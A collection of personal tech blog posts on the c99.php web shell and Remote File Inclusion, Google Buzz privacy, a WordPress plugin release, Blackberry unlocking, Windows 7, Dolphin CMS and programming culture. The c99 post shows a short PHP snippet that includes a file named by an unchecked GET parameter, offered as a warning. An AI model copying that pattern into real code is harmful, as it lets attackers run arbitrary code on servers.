Made of Everything You're Not

If you were a sysadmin a few years ago, and you had php on your servers, you’re probably already familiar with c99. In case you haven’t had the personal pleasure, c99, or specifically c99.php (hint: check the source), is the name of a script used by hackers to gain access to a web server running php using an exploit technique called Remote File Inclusion.

The Horrors of C99.php

A Little History

See, back in the day some php developers were pretty stupid. (Admit it; you were stupid once too.) What other explanation could there be for writing code that allowed the injection of arbitrary routines into a program. Trivially easy too.

To be fair, PHP was to blame a little for this as well. Given PHP’s high adoption, and design, by, and for, newbie programmers allowing such a technique by default was just ill conceived, and maybe even a little negligent. I understand the desire, and sometime need, for a technique that could be dangerous but to enable the feature by default…. damn man…

So, the risk was known, yet code was still being written (like the below example) that allowed remote file inclusion to be possible. Mostly because of the aforementioned default setting.

<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
{
	$color = $_GET['COLOR'];
}
require( $color . '.php' );
?>

BTW, if you currently write code that does anything like the above, frankly, you’re an idiot. You aren’t nearly as smart and clever as you think you are. I promise you this will bite you. Bad too.

About C99.php

So, using a technique like the above opens you up to learning first hand about c99.php. Finding information about the program itself is a little tricky but there are a couple examples that highlight just how devastating it can be.

When malicious intruders compromise a web server, there’s an excellent chance a famous Russian PHP script, r57shell, will follow. The r57shell PHP script gives the intruder a number of capabilities, including, but not limited to: downloading files, uploading files, creating backdoors, setting up a spam relay, forging email, bouncing a connection to decrease the risk of being caught, and even taking control of SQL databases. All these functions become readily available through an easy to use web interface, but now you can fight back.

Using the above explanation, which I agree with, c99.php acts as an interface to control your server. Once it’s on your server an attacker has easy access to view all the files and their contents, make changes to the system, upload new files, manipulate the database(s) and more.

Quite the nasty little script but pretty elegant in how it’s implemented. c99 is a completely standalone script; even the images are embedded inside using base64!

Until a month ago I would have thought the risk of encountering c99.php in the wild would have been small these days. Then, SMACK!!, a client had a site get hacked (quick CYA; that I didn’t’ work on ) using c99. So be warned. It’s out there and if you’re not smart, or if you’re a lazy, lazy, coder, c99 will get you.

With the release of Google Buzz last week a lot of people have been screaming bloody murder over some privacy concerns they have and Google’s perceived lack of forethought on the matter.

Google Didn't Fuck You; You Did

First, Google Buzz appears to be a FriendFeed clone that Google just launched about a week (or 2) ago. Initially, it was enabled inside of all gmail accounts by default without any authorization to the contrary. I haven’t had the opportunity to try it though. Not because I don’t use gmail (I do; sorta) but because I use Google Apps gmail which wasn’t a part of the rollout.

From what I can glean; Google Buzz works by parsing your contact list and then making connections between everyone in it and displaying their social network activity info publicly for all to see (seriously, just like FriendFeed). Make sense? No? Here’s the Crunchgear explanation of Google Buzz:

Google Buzz is a social network and sharing product built by Google. Based within Google Profiles, Buzz offers a stream of status updates, pictures, links, and videos from your friends. You can “like” these items and you can comment on them. Updates from Flickr, Picasa, Google Reader, or Twitter can also be automatically imported into a Buzz stream. Buzz will recommend items you might like based on your friends’ activity.

So, apparently, one of the “features” of Google Buzz is that when it was initially released it displayed your contact list publicly which raised all sorts of hell from people who can’t afford for this to happen (think lawyers, journalists, etc).

This smacks of a high level of naivete on most of the users. Under what delusion are people living in to think that they have any expectation of privacy from a publicly traded company. Yes, I know they claim to care about your privacy, and I’m sure on a personal level the people working for Google do, in fact, care about your privacy. But the organization itself? Not a fucking chance.

Let’s get serious here; as stated above, Google is a publicly traded company which means their priorities start and end with cash ($$$). Frankly, it’s naive to think otherwise. Ask any corporate officer and they’ll tell you they have a responsibility to their shareholders. This is a notorious lose for consumers but it’s the reality nonetheless. Cry all you want but Google fucking their users in this way did ensure they launched a new social network with millions of users. From a fiscal standpoint, this was a HUGE win even with all the bitching and moaning. Even taking into account any users who would leave Google (along with any ill will this may have created) this was still a winning strategy for launch.

If privacy is an issue then, it seems to me, that you really should have taken greater measures to protect yourself. Relying on Google to protect something like this screams of escapism and finger pointing. Guess what? It’s your fault. Deal with that instead of crying that a publicly traded company that provides a service you use for free does something in a way that you don’t like.

Do I think that Google was right in any way for doing what they did? Not for a second. That said, people need to take responsibility for their own needs instead of blindly trusting a for profit company to do it for them. Yes, even when that company claims to “do no evil”.

I hadn’t really had much time to announce this (what with the holidays and stuff) but last week WP-Click-Track 0.7 was released. This release includes a few bug fixes and a couple new features. I’d planned to release this a while ago but testing took a little longer than anticipated but it’s finally done.

WP-Click-Track 0.7 Released (Umm Last Week)

There were a couple minor, edge, bugs that I don’t want to go into detail about but there were 2 in particular that deserve a mention.

First, there was a bug fix for SSL enabled admins. This one I hadn’t really anticipated; I’d never thought someone would use ssl for the admin panel. The problem was that if you went to the admin through ssl the graphs wouldn’t render properly. My bad.

Then there was an issue in the graphs. If the charted number was over 1,000 the chart would basically throw up. Rookie move on my part but some escaping fixed that right up. If you ran into this bug I’m really sorry.

0.7 also includes an improved cookie model. I admit, I’ve been completely lazy about cookie management for years now. Yes, sessions are nice but when you’re building for a multi-server environment sessions can get a little tricky. Problem is that there are some pretty specific rules for cookies and just setting a cookie willy nilly, without any thought to the implications, can screw things up. Now it’s much, much, better.

Among the additions there’s a new configuration value to disable tracking of internal links. This should help with all the clicks in peoples galleries I’ve been hearing so much about

Speaking of configuration the entire configuration section has been rewritten to be more user friendly. Instead of the HUGE and confusing single page everything is organized into tabs and should, hopefully, make for a better experience when you do have to configure something.

Anyway, you can install it within the WordPress plugin manager or if you want to take a  look at the code here you go.

My business partner recently had her phone literally break apart in her hands. Since communication between us is pretty crucial I decided to give her a backup Blackberry Curve I had as a replacement for my Blackberry Bold. Problem was that the Curve was bought through AT&T and she uses T-mobile. The phone would have to be unlocked.

How To Unlock AT&T Blackberry

Initially, I was a little nervous about the process of  unlocking the Blackberry. I’d never personally tried anything like this and my direct experience with the process was that a 3rd party company would have to be brought into the mix. I didn’t relish the idea of paying someone to handle what seemed to be a simple exercise when I’m capable of pushing buttons on a freaking phone.

Turns out it’s actually extremely easy to handle this yourself though it does require a phone call to AT&T support. Simply call them up and they’ll ask you for your IMEI code; it’s under the battery on the serial number label. They’ll send you an email, like the below, that’ll walk you through the process.

Your device unlock request was received and processed, see below for details:

IMEI: YOUR_IMEI_NUMBER

Unlock Code: YOUR_UNLOCK_CODE

Caution: If this process is unsuccessful ten times in a row, the phone will be permanently locked to the at&t network. Do not attempt to enter the code more than one (1) time total.  Instructions below will assist you in unlocking your device, if these steps are unsuccessful please contact us at 1-800-331-0500 or (916) 843-4685 from overseas.

Blackberry 8310

Follow these steps to unlock device:

1. Turn off the radio! VERY IMPORTANT

2. Go to “Options”

3. Scroll to and select “Advanced Options”

4. Click on “SIM Card”

5. Type “MEPD” (You will not see on display what is being typed. To obtain a “P” double tap “OP” key)

6. Type “MEP2” (To obtain a “P” double tap “OP” key. Press “ALT “key to obtain a “2″)

7. Enter the unlock code

8. Press enter

9. Reboot device. Device is now unlocked.

Note: To verify the IMEI, dial *#06# on device’s keypad, 15 digit # IMEI will display on the screen.  If this sequence does not work, pull the back/battery off the phone and the IMEI will be listed on the back of the phone.

All told the total time invested was only about 5 minutes. Seriously, 5 minutes. So why would I want to pay someone for this again?

When I purchased my newest laptop back in July, from Best Buy, it came with a free upgrade to Windows 7 when it came out a few months later. Fast forward to December and I’ve since received the new operating system and have installed it on the laptop. Since a lot of people are going to be going through the same thing I put together some notes about the experience.

Windows 7

Because the promotion was for a version of Windows 7 that was the same flavor as the installed Windows Vista, I was given a 64bit Windows 7 Home Premium copy. Personally, I would have preferred Business or Ultimate but ok, fine Home Premium it is. At least this meant that I wouldn’t have to do a clean install so I could keep all files and programs where they were (still backing up the data of course).

The upgrade package came with 2 discs; the Windows 7 disc and a driver upgrade disc. The instructions said to insert the upgrade disc first and I’ll be prompted to enter disc 2 when required. Doing so started an upgrade program that inspected my system and warned me about deauthorizing my iTunes account which immediately made me feel good about the experience.

All told the install took around 3.5 hours and was like watching water boiling. I did it super late at night but I was still up and every time I would check on it I swear the progress rarely looked like it was making any progress. Still, it is Windows, so I was used to this; just wait and be patient, it’ll finish. And eventually it did.

Upon first booting up there were a couple issues. One was my fault. The others… not so much. Probably the worst offense was that I had no Internet connectivity. I checked both my wired NIC and the wifi and both were working  fine; I could connect to my router through both and I could find my Xbox and PS3 on the network. I just couldn’t get online. I eventually found that this was caused by a conflict between Esets firewall (which I had disabled in Vista) and the native Windows firewall. Uninstalling Eset and reinstalling it solved the issue.

I also had an issue with my local Apache webserver working. After checking the logs it turned out to be a soft link I had created under Vista to link the conf directory (makes editing the files from my working directory that much easier). Creating a new link solved the issue nicely.

The last issue is with the touchpad; and I haven’t really fixed it yet. At first, Windows thought the touchpad was a PS/2 mouse. This wouldn’t be an issue except I like the scrolling functions on the touchpad and the PS/2 drivers don’t support it. This seemed like a cut and dry driver issue except I installed all the latest drivers for my laptop that Gateway offered and it still doesn’t work all that well. Yes, it’s there but not in any real functional way. It’s jerky and hesitant when it works (around 30% of the time). Not enough to get me to downgrade but still a pain.

I’ve never really had an issue with Vista but I was still excited about Windows 7. Even though there were a couple hiccups during the install, and that my touchpad isn’t operating 100%, I’m still really happy with the experience.

It’s crazy to me how important email is; it’s almost 2010 and I’m still, still, relying on email for communication more than anything else. Considering just how broken email is this, along with how I know it’s broken, this isn’t a little surprising. Managing the shear amount of email I get used to be pretty easy but now… it’s a little more painful but still manageable.

IMAP on Blackberry: The Poor Mans BES

When I had the day job I had access to a nice little network with Exchange 2003 and the latest Blackberry Enterprise Server (BES). It never really occurred to me how spoiled this would make me but, now that it’s gone, it’s pretty obvious how much I relied on it for my email management.

Why? Syncing. Loved the whole syncing aspect; open an email on your Blackberry and the email was marked as open in Exchange. Send an email from your Blackberry and it appeared in your sent folder in Outlook. Even better if you sent an email in Outlook, through Exchange, it was put in your sent folder on your Blackberry. Simple. This was great for things like filing and responding to emails. Put simply, using the Exchange/BES combo allowed you to keep all your communication in sync.

Then I get unplugged from the BES and have to setup a new solution. First, I went to POP3 (as I was most familiar with the protocol) but this was a cluster fuck of a bad idea. Yes, email was put on the Blackberry but it’s a one way method and nothing was kept in sync. I’d do something on the device and when I would go to Gmail nothing would be there; this couldn’t do.

I also tried the native Gmail Blackberry app but this too wasn’t ideal; I hated how it wasn’t truly a “native” app in that other apps would still open the default Blackberry message program to do anything email related. For example, if I clicked on an email on a web page while on the Blackberry it wouldn’t open the Gmail app but the native messaging one instead. I was surprised how much this happened and how much it bothered me but it did.

Then I learned that Gmail has IMAP support and have been using it ever since. So far, IMAP is the closest approximation of the BES experience I’ve found. It’s not without it’s issues or anything, and technically it’s not supported by Google, but it’s the best solution I’ve found.

Probably the biggest issue I have with the IMAP integration is that mail manipulated on the Gmail site doesn’t get synced to my Blackberry. This isn’t too bad since I usually only use the Gmail site for sending but if I want to keep things in sync I have to treat the Blackberry as the master.

To keep the calendar and contacts in sync requires the use of another Blackberry app called Google Sync. Google Sync it’s keeps your contacts and calendar synced up between Google Calendar and Gmail contacts and your Blackberry.

While it’s not a perfect solution I’ve been mostly happy with IMAP and Gmail on the Blackberry. It’s way, way, better than paying money for an outsourced BES / Exchange account.

It’s interesting how life can throw you a little too much coincidence. For example, I was having a nice conversation (with a pretty smart dude) where it was mentioned how much more painful development on large projects used to be back in the confused days of early PHP. Then life decided to highlight this little message with a project using Dolphin 6.1 from Boonex.

Your Soul is the Fish

The work came from a client that had a straight-forward install of Dolphin. She wanted to customize it a bit to make it a little more user friendly; nothing too difficult. Before the project came to me the client had gone the usual route of hiring someone on the cheap who ended up not being up to the task and was, subsequently, left high and dry. This left me with a project that had some of the work started, but not finished, which added to the pain a little but Dolphin sure has it’s own ways of ruining a mood.

In case anyone else has the misfortune of having to work on a Dolphin CMS project I thought I’d highlight just what you’re in for.

The Good

To be fair, for as bad of a nightmare Dolphin CMS is as a project (compared to coding standards in today’s landscape), it does have one or two(ish) redeeming qualities.

For one thing Dolphin CMS has a pretty logical directory structure. Looking for the language file? Why it’s in the “lang” directory of course. Looking for a class? Just check out the “inc/classes” directory. Admittedly, this is a small thing if you’re using a modern IDE but I still appreciate it (so many programs I’ve ran into lately don’t even include this level of logic).

Dolphin CMS also has what can only be called an advanced admin panel. This thing allows you to customize all sorts of areas including the content of pages as well as the layout of the pages. I had a lot of fun playing with that thing. This is double edged though because it serves no practical purpose if you want something unique and cool. For newbies though I think this is a nice feature to learn about the possibilities for a website.

The Bad

Right off, Dolphin CMS is PHP 4 compatible. This is just silly; it’s fucking 2009 already and Dolphin CMS using PHP 4 as a baseline is probably more to blame for the rest of this list than anything else. If you’re going to use old technology why not use old coding standards? In that situation I imagine complacency and laziness would come naturally.

Then there’s the use of short tags in Dolphin CMS. I admit to having a problem myself with maintaining this standard (it’s still natural for me in a template file) but it’s irritating if you have short tags disabled in your ini file.

Another offense: inline HTML and PHP together ALL OVER THE PLACE. You can’t hardly open any file, seriously, any file, without wanting to tear your eyes out of your skull from the cluster fuck in front of you. Add to that the confusion in that the system has a template system (see below) Dolphin CMS just doesn’t use it for the parts you’d actually want to change. Gave me a headache when I would think about it.

As mentioned above there is a template system (of sorts) but it doesn’t actually templatize anything. I guess it’s more of a layout system but considering the majority of templates only had header, footer and content references it’s a poorly utilized one. To make it even worse though Dolphin CMS uses a hard-coded, numerically indexed, naming convention. Want to know what template file you’re file is using? Just open up that file and look for a variable called “$_page['name_index']” and use the value as a reference. Seriously, why would you use a number instead of something meaningful like the name of the file (or similar)?

Back Pedaling

I just got done working with Dolphin CMS so, yes, I’m a little raw. Wah; I know. Still, the fact remains that Dolphin CMS is one of the biggest pains in the ass to work with that I’ve run into in quite some time. It’s not too complicated to work on, it’s structure should be familiar to anyone who’s worked with PHP ten years ago, which is it’s biggest issue. You have to dumb yourself down to work with. And for the love of god don’t try and abstract anything.

The most heinous thing though is that Boonex actually charges for this filth. Real money too. Crap can be excused if it’s free but there’s nothing worse than paying for a box full of horse shit.

One of the most natural things to do while being an obsessive programmer is focusing on the minutia. Not only do our projects have to perform and function to our standards but they also have to be structured “just so” with just the right comment style and just the right indentation to space ratio (4 of course!). Point being that, for me, it’s ridiculously easy to spend time and energy focusing on, what amounts to in the end, as trivial. I was reminded of this while playing around with the latest release of PHPLoc (1.40).

Photo: Grahambones

PHPLoc is a project by Sebastian Berman that measures the size of a PHP project. In a nutshell PHPLoc is a project analyzer that shows details like amount of classes, files, directories and total Lines Of Code (PHPLoc get it?) to name a few features. It’s ran from the command line and I had no issue getting it to work on Windows (huge plus for quality IMHO).

According to the Git repository:

phploc is a tool for quickly measuring the size of a PHP project.

The goal of phploc is not not to replace more sophisticated tools such as phpcs, pdepend, or phpmd, but rather to provide an alternative to them when you just need to get a quick understanding of a project’s size.

PHPLoc works as a PEAR module (requires PEAR installer version 1.8.1 at least) and as such is really easy to install. There’s some great instructions on the Git site that I had zero issues with (outside of having to update PEAR) so I won’t go into detail here.

Here’s an example of the output when ran against a Zend Framework 1.9 distribution:

C:\php>phploc --count-tests C:\ProjectFiles\ZF
phploc 1.4.0 by Sebastian Bergmann.
 
Directories:                                        393
Files:                                             1856
 
Lines of Code (LOC):                             372292
  Cyclomatic Complexity / Lines of Code:           0.11
Comment Lines of Code (CLOC):                    173793
Non-Comment Lines of Code (NCLOC):               198499
 
Namespaces:                                           0
Interfaces:                                          94
Classes:                                           1758
  Abstract:                                         155 (8.82%)
  Concrete:                                        1603 (91.18%)
  Lines of Code / Number of Classes:                167
Methods:                                          12377
  Scope:
    Non-Static:                                   11517 (93.05%)
    Static:                                         860 (6.95%)
  Visibility:
    Public:                                        9886 (79.87%)
    Non-Public:                                    2491 (20.13%)
  Lines of Code / Number of Methods:                 23
  Cyclomatic Complexity / Number of Methods:       2.78
 
Anonymous Functions:                                  0
Functions:                                            0
 
Constants:                                         3361
  Global constants:                                   1
  Class constants:                                 3360
 
Tests:
  Classes:                                            2
  Methods:                                            0

As you can see, PHPLoc gives some really nice insight into a project. I have to admit I’m more interested in the OCD satisfaction than the practical reasons but it’s still cool. Definitely check it out if you’re looking to get some interesting though completely trivial information about your project.

Anyone who knows me knows I’m not a fan of social networks. Frankly, I find participating in social networks to be a false representation of social behavior;  a farce I just don’t have the desire to humor. Not to get too preachy here but, well, this is my blog so na-na-nana-na:

Mea Culpa Twiter. Mea Culpa...

The way I look at social networks is as time sinks with little practical use compared to the maintenance and care required for the account. Not that I find them useless though. I had spent the last 4 years (around) working for a social marketing agency and have personally witnessed the benefits of social networks in building brand awareness and loyalty. But the work required entailed a dedicated, college educated, person and a couple student interns working 40 hours a week each to accomplish.

Me? I have shit to do thankyouverymuch. I want to spend my time producing ideas, projects and programs. I don’t want to spend any time tending to a social network profile with ephemeral friendships and connections. But apparently Twitter is different. Michael Lop sums it up nicely:

Twitter is a social network, yes, but it’s a social network without the superpoke scrabtaculous zombie noise and, for that, I’m thankful, because I’ve got work to do. Yes, I could spend days tidying my profile and scrubbing my friends list, but to what end? I want to know more people, and sure, it’s interesting to see what they’re up to, but what I really want to know is what is going on inside their heads with a minimum of fuss.

So once again I’m late to a party acting like they’re lucky to have me. I have finally, finally, begun to see the usefulness and benefits of Twitter. It’s weird because I’ve been working so closely with Twitter for the last year interacting with their API and I never “got” it until recently. I’m actually a little embarrassed about this. So many of my personal friends are on Twitter along with my peers online and I was a little pompous about the whole thing. My Bad.

What ended up turning  my perspective around was the realization that Twitter didn’t take any real effort. Outside of the marketing and announcement use (blog posts/updates, code release, project release, etc) all other status updates Twitter needs can be completely random thoughts along the lines of  a friendly conversation.

One key difference between Twitter and this blog is that this blog, and the discussion in it, are not in any way personal towards me or anyone else. But with Twitter, well, that can be, and probably should be, personal and a little intimate. Not completely understand, but the conversation appears to need to be a little more random and personal.

When I ask myself why I have this blog (and really why I think anyone has a blog), and if there’s a requirement of complete honesty, career is definitely at the top of the list. Yes there’s a love of writing and the conversation. But after that, career and ambition are what really motivates me to write and drives this site. (And yes ego has a little to do with it too but that’s a whole other discussion )

So, we’re really talking about a tool of promotion and marketing. I can understand that a little better for some reason.

So yes. I am on Twitter now and I actually like it. It’s liberating to be so open (which doesn’t make much sense to me at all… but there it is). If you’re a fan of this blog (hell, even if you hate me and think I’m an idiot) you might want to follow me .

When I was a kid I remember McDonald’s as having some of the best food and providing the best experience ever. Just the thought of going there was exciting. Breakfast, lunch and dinner; it didn’t matter what meal it was. They went out of their way to, at least try, to make the experience fun for the kids. Yes, this was part of a plan to get the kids hooked to bring in the family (which it did in spades) but it was one of those rare strategies that was win-win for both the customer and company.

Welcome to The McDonaldification of Web Development

Fast forward 20 years (sigh…) and McDonalds and it’s ilk are the lowest of the low when it comes to quality of service and product. It’s been years since any fast food restaurant has provided me with an experience worthy of my money; the food is always horrible processed shit, and the service (even at the most basic of basic levels) is completely nonexistent. Hell, I can’t remember the last time I was given ketchup with fries without having to ask for it…

Having worked in web development professionally for the last eight years I’m starting to notice a similar pattern in this industry. What was once an industry ruled by high profits for a job performed by professionals (mostly anyway) has quickly become an industry full of amateurs and scammers (mostly) trying to make as much money with as little thought to quality as quickly as possible. I’ve spoken before about the lack of quality I find in a lot of programmers I work with, and while I’m not saying it’s the complete cause, I do think there’s a link.

Oddly, I’m in the minority here. In my, limited, exposure to other programmers I can say definitively that the majority just plain suck; mostly because they refuse to grow and learn.

I’ve heard all the arguments before, “My weekends are mine”, “I work hard enough; I don’t have the energy”, and the best ever, “My employer should pay for this like Google does. Whah!!”. (I know Google doesn’t, in fact, do this but people still say it.) All just pure crap excuses for maintaining a level of competence just high enough to not get fired.

Bottom line: working 8 hours a day is just not enough to matter. If you think you’re a programmer and you don’t spend time improving your skills you’ll quickly, really quickly, become obsolete. It just doesn’t matter if .Net is going to be around forever and your employer won’t ever upgrade from 1.1; you’re a hack (and not in a good way).

Now that I’m an active freelancer I’m really, really, starting to see the differences. Time and time again I end up taking a meeting with someone who has just been worked over by others in this field. The stories some of these companies and people have are just appalling and I’ve heard some doozies. Worst of all, behavior like this tends to skew their perspective and they view all freelancers as suspect.  Too much of my time is spent building confidence in me as a professional it’s really starting to become laughable.

It was all really quite the mystery until I recently reached out on craigslist to find a designer for a WordPress theme (I need to update this site BAD). I was pretty explicit that all I was looking for was a PSD file that I would personally turn into a WordPress theme but 4 out of 5 responses to the ad indicated that the respondent hadn’t even read the post. Frankly, it was irritating wading through the crap and, obviously, automated responses.

This is troubling for a couple reasons. For one thing it basically indicates, to me anyways, that the person (company, freelancer, whatever) had very little regard for what I wanted, instead opting for a fastest gun approach. The number of emails I received immediately after posting my ad was around 20 and after reviewing each one it was obvious they were automated. I pity the individual or company who entertains these people.

The long term harm this can cause for other programmers (much less themselves) is completely short sighted. Crappy work begets a crappy experience for the client. Simple.